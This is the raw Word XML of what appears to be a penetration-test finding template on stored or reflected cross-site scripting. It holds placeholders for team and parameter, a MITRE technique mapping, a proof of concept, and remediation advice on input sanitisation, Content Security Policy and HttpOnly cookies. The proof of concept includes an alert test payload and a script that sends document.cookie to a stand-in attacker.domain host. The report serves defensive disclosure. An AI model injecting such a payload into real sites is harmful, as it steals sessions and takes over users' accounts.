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764F8A" w:rsidRDefault="00764F8A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764F8A" w:rsidTr="543BE115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764F8A" w:rsidTr="543BE115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764F8A" w:rsidRDefault="00293FEA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5C601DB5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64F8A" w:rsidTr="543BE115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764F8A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64F8A" w:rsidTr="543BE115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764F8A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64F8A" w:rsidTr="543BE115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764F8A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64F8A" w:rsidTr="543BE115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764F8A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64F8A" w:rsidTr="543BE115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764F8A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64F8A" w:rsidTr="543BE115" w14:paraId="3914982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P="543BE115" w:rsidRDefault="00293FEA" w14:paraId="175A442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 cross-site scripting vulnerability is a result of mishandling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unsanitized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user input which we have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demonstrated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could be exploited by an adversary to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exfiltrate user login cookies for sessions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from web applications with {no prerequisites, minimal privileges, any valid user account, specific user roles}.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In the event of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such an attack, this could lead to an attacker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escalating privileges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a different user’s account on the web site.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="00764F8A" w:rsidTr="543BE115" w14:paraId="359BE17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276AAE8B" wp14:textId="496F9E9E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elevated privileges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leading to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 or operational disruptions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This could affect potentially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confidential or regulated customer data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web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applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="00764F8A" w:rsidTr="543BE115" w14:paraId="7724B030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11694E4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T1189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Drive-by Compromise</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00764F8A" w:rsidRDefault="00293FEA" w14:paraId="0515A1C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M1048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Application Isolation and Sandboxing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="00764F8A" w:rsidTr="543BE115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764F8A" w:rsidTr="543BE115" w14:paraId="7DF4F59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764F8A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64F8A" w:rsidRDefault="00293FEA" w14:paraId="71CF9055" wp14:textId="2DB33AD9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To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 proof-of-concept {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stored|reflected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} XSS attack, </w:t>
            </w:r>
            <w:r w:rsidRPr="543BE115" w:rsidR="10F75BC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{Team ##}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{method for sending input} where the {parameter name} parameter has value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&lt;script&gt;alert(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1)&lt;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/script&gt;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. Then, when a {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user|administrator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} loads {page where XSS is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rendered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}, the attacker-controlled script is executed.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00764F8A" w:rsidRDefault="00764F8A" w14:paraId="72A3D3E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64F8A" w:rsidRDefault="00293FEA" w14:paraId="4FD5751F" wp14:textId="5DAA6E54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attacker can use this mechanism to steal sensitive data from the victim browser, using a payload such as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&lt;script&gt;fetch(`http://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attacker.domain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/?cookie=${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document.cookie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}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`)&lt;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/script&gt;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exfiltrate the victim’s cookie and take over the user session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="00764F8A" w:rsidTr="543BE115" w14:paraId="63F10721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F8A" w:rsidRDefault="00293FEA" w14:paraId="2D366AC8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Implement Input Validation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764F8A" w:rsidRDefault="00293FEA" w14:paraId="6CC28704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Ensure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all user inputs are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properly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validated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and sanitized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prevent cross-site scripting attacks. Utilize functions like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htmlspecialchars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(for PHP web apps) for input validation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00764F8A" w:rsidRDefault="00293FEA" w14:paraId="12E3B881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Set a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Content Security Policy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prevents the execution of JavaScript from untrusted origins.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00764F8A" w:rsidRDefault="00293FEA" w14:paraId="57233D20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Set cookies to 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HttpOnly</w:t>
            </w:r>
            <w:r w:rsidRPr="543BE115" w:rsidR="00293FEA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543BE115" w:rsidR="00293FEA">
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Light" w:hAnsi="Montserrat Light" w:eastAsia="Montserrat Light" w:cs="Montserrat Light"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>to prevent an attacker script from being able to access them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="00764F8A" w:rsidRDefault="00764F8A" w14:paraId="0D0B940D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764F8A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93FEA" w:rsidRDefault="00293FEA" w14:paraId="60061E4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293FEA" w:rsidRDefault="00293FEA" w14:paraId="44EAFD9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F3E1340E-9C90-4679-9080-8517CB072A72}" r:id="rId1"/>
    <w:embedBold w:fontKey="{254F8C24-66F2-423F-B0CD-B3AE4C6C771D}" r:id="rId2"/>
    <w:embedItalic w:fontKey="{AB10EBFE-D649-4F18-991C-CB7FF7E4EC44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0CE6AE8D-7596-47C2-AD81-D4F4FB07D168}" r:id="rId4"/>
    <w:embedBold w:fontKey="{110811B2-4BCA-4F77-8869-6E19EEA66CE0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66C05940-0758-4C57-8748-892730136C0B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F958BE81-1631-48C8-A1C1-D534905308C0}" r:id="rId7"/>
    <w:embedBold w:fontKey="{51B5D808-E2A3-45E9-AE36-7F32510D1675}" r:id="rId8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B78DDD9-1AD6-4232-869B-D7E55363BE4A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531BA4B-E65E-471E-8EFD-17032166F540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DA60DF6-96B1-44FA-9454-99E9034A6155}" r:id="rId1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64F8A" w:rsidP="3812651B" w:rsidRDefault="00293FEA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3812651B" w:rsidR="3812651B">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="E41111"/>
      </w:rPr>
      <w:t>CONFIDENTIAL /</w:t>
    </w:r>
    <w:r w:rsidRPr="3812651B" w:rsidR="3812651B">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="E41111"/>
      </w:rPr>
      <w:t>/  TLP</w:t>
    </w:r>
    <w:r w:rsidRPr="3812651B" w:rsidR="3812651B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64F8A" w:rsidRDefault="00764F8A" w14:paraId="4B94D5A5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93FEA" w:rsidRDefault="00293FEA" w14:paraId="3DEEC669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293FEA" w:rsidRDefault="00293FEA" w14:paraId="3656B9AB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64F8A" w:rsidRDefault="00293FEA" w14:paraId="399A5E65" wp14:textId="77777777">
    <w:pPr>
      <w:spacing w:after="27"/>
      <w:ind w:right="585"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="3812651B" w:rsidP="3812651B" w:rsidRDefault="3812651B" w14:paraId="32C4B1B3" w14:textId="6C469324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64F8A" w:rsidRDefault="00293FEA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3A133D01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764F8A" w:rsidRDefault="00764F8A" w14:paraId="45FB0818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1462326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36458044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12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97812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8A"/>
    <w:rsid w:val="00293FEA"/>
    <w:rsid w:val="003150EF"/>
    <w:rsid w:val="00764F8A"/>
    <w:rsid w:val="09E8BC94"/>
    <w:rsid w:val="10F75BC2"/>
    <w:rsid w:val="168C1819"/>
    <w:rsid w:val="175096CE"/>
    <w:rsid w:val="1F3C1207"/>
    <w:rsid w:val="2140A6C8"/>
    <w:rsid w:val="2628490E"/>
    <w:rsid w:val="3812651B"/>
    <w:rsid w:val="543BE115"/>
    <w:rsid w:val="6A8E04D9"/>
    <w:rsid w:val="7CEB9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0E13D"/>
  <w15:docId w15:val="{3A7DBF63-8FBC-4BB5-BF10-63B4F0D705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3</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-22T21:34:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-28T21:24:32.9854867Z</dcterms:modified>
</coreProperties>
</file>